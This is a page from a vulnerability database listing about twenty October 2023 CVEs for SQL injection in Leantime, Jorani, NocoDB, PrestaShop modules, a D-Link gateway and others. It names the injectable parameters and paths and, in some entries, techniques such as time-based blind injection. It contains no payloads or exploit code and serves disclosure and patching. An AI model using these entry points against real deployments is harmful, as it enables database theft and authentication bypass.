Total
14188 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2023-45826 | 1 Leantime | 1 Leantime | 2023-10-27 | N/A | 6.5 MEDIUM |
| Leantime is an open source project management system. A 'userId' variable in `app/domain/files/repositories/class.files.php` is not parameterized. An authenticated attacker can send a carefully crafted POST request to `/api/jsonrpc` to exploit an SQL injection vulnerability. Confidentiality is impacted as it allows for dumping information from the database. This issue has been addressed in version 2.4-beta-4. Users are advised to upgrade. There are no known workarounds for this vulnerability. | |||||
| CVE-2023-43192 | 1 Jrecms | 1 Springbootcms | 2023-10-26 | N/A | 8.8 HIGH |
| SQL injection can exist in a newly created part of the SpringbootCMS 1.0 background, and the parameters submitted by users are not filtered. As a result, special characters in parameters destroy the original logic of SQL statements. Attackers can use this vulnerability to execute any SQL statement. | |||||
| CVE-2023-45381 | 1 Webshopworks | 1 Creativepopup | 2023-10-25 | N/A | 9.8 CRITICAL |
| In the module "Creative Popup" (creativepopup) up to version 1.6.9 from WebshopWorks for PrestaShop, a guest can perform SQL injection via `cp_download_popup().` | |||||
| CVE-2023-43986 | 1 Dmconcept | 1 Configurator | 2023-10-25 | N/A | 9.8 CRITICAL |
| DM Concept configurator before v4.9.4 was discovered to contain a SQL injection vulnerability via the component ConfiguratorAttachment::getAttachmentByToken. | |||||
| CVE-2022-39180 | 1 College Management System Project | 1 College Management System | 2023-10-25 | N/A | 9.8 CRITICAL |
| College Management System v1.0 - SQL Injection (SQLi). By inserting SQL commands to the username and password fields in the login.php page | |||||
| CVE-2022-3059 | 1 Schoolbox | 1 Schoolbox | 2023-10-25 | N/A | 7.5 HIGH |
| The application was vulnerable to multiple instances of SQL injection (authenticated and unauthenticated) through a vulnerable parameter. Due to the stacked query support, complex SQL commands could be crafted and injected into the vulnerable parameter and using a sleep based inferential SQL injection it was possible to extract data from the database. | |||||
| CVE-2022-36787 | 1 Webvendome Project | 1 Webvendome | 2023-10-25 | N/A | 9.8 CRITICAL |
| webvendome - webvendome SQL Injection. SQL Injection in the Parameter " DocNumber" Request : Get Request : /webvendome/showfiles.aspx?jobnumber=nullDoc Number=HERE. | |||||
| CVE-2023-45379 | 1 Posthemes | 1 Posrotatorimg | 2023-10-25 | N/A | 9.8 CRITICAL |
| In the module "Rotator Img" (posrotatorimg) in versions at least up to 1.1 from PosThemes for PrestaShop, a guest can perform SQL injection. | |||||
| CVE-2023-2681 | 1 Jorani | 1 Jorani | 2023-10-25 | N/A | 8.8 HIGH |
| An SQL Injection vulnerability has been found on Jorani version 1.0.0. This vulnerability allows an authenticated remote user, with low privileges, to send queries with malicious SQL code on the "/leaves/validate" path and the “id” parameter, managing to extract arbritary information from the database. | |||||
| CVE-2022-34132 | 1 Jorani | 1 Jorani | 2023-10-25 | 7.5 HIGH | 9.8 CRITICAL |
| Benjamin BALET Jorani v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at application/controllers/Leaves.php. | |||||
| CVE-2023-46006 | 1 Mayurik | 1 Best Courier Management System | 2023-10-25 | N/A | 9.8 CRITICAL |
| Sourcecodester Best Courier Management System 1.0 is vulnerable to SQL Injection via the parameter id in /edit_user.php. | |||||
| CVE-2023-46005 | 1 Mayurik | 1 Best Courier Management System | 2023-10-25 | N/A | 9.8 CRITICAL |
| Sourcecodester Best Courier Management System 1.0 is vulnerable to SQL Injection via the parameter id in /edit_branch.php. | |||||
| CVE-2023-46007 | 1 Mayurik | 1 Best Courier Management System | 2023-10-25 | N/A | 9.8 CRITICAL |
| Sourcecodester Best Courier Management System 1.0 is vulnerable to SQL Injection via the parameter id in /edit_staff.php. | |||||
| CVE-2023-43794 | 1 Xgenecloud | 1 Nocodb | 2023-10-24 | N/A | 4.9 MEDIUM |
| Nocodb is an open source Airtable alternative. Affected versions of nocodb contain a SQL injection vulnerability, that allows an authenticated attacker with creator access to query the underlying database. By supplying a specially crafted payload to the given an attacker can inject arbitrary SQL queries to be executed. Since this is a blind SQL injection, an attacker may need to use time-based payloads which would include a function to delay execution for a given number of seconds. The response time indicates, whether the result of the query execution was true or false. Depending on the result, the HTTP response will be returned after a given number of seconds, indicating TRUE, or immediately, indicating FALSE. In that way, an attacker can reveal the data present in the database. This vulnerability has been addressed in version 0.111.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-141`. | |||||
| CVE-2023-45951 | 1 Lylme | 1 Lylme Spage | 2023-10-24 | N/A | 9.8 CRITICAL |
| lylme_spage v1.7.0 was discovered to contain a SQL injection vulnerability via the $userip parameter at function.php. | |||||
| CVE-2023-45386 | 1 Mypresta | 1 Product Extra Tabs Pro | 2023-10-23 | N/A | 9.8 CRITICAL |
| In the module extratabspro before version 2.2.8 from MyPresta.eu for PrestaShop, a guest can perform SQL injection via `extratabspro::searchcategory()`, `extratabspro::searchproduct()` and `extratabspro::searchmanufacturer().' | |||||
| CVE-2023-45375 | 1 01generator | 1 Pireospay | 2023-10-23 | N/A | 8.8 HIGH |
| In the module "PireosPay" (pireospay) before version 1.7.10 from 01generator.com for PrestaShop, a guest can perform SQL injection via `PireosPayValidationModuleFrontController::postProcess().` | |||||
| CVE-2023-5053 | 1 Projectworlds | 1 Hospital Management System In Php | 2023-10-20 | N/A | 9.8 CRITICAL |
| Hospital management system version 378c157 allows to bypass authentication. This is possible because the application is vulnerable to SQLI. | |||||
| CVE-2023-44694 | 1 Dlink | 2 Dar-7000, Dar-7000 Firmware | 2023-10-20 | N/A | 9.8 CRITICAL |
| D-Link Online behavior audit gateway DAR-7000 V31R02B1413C is vulnerable to SQL Injection via /log/mailrecvview.php. | |||||
| CVE-2023-34210 | 1 Easyuse | 1 Mailhunter Ultimate | 2023-10-20 | N/A | 8.8 HIGH |
| SQL Injection in create customer group function in EasyUse MailHunter Ultimate 2023 and earlier allow remote authenticated users to execute arbitrary SQL commands via the ctl00$ContentPlaceHolder1$txtCustSQL parameter. | |||||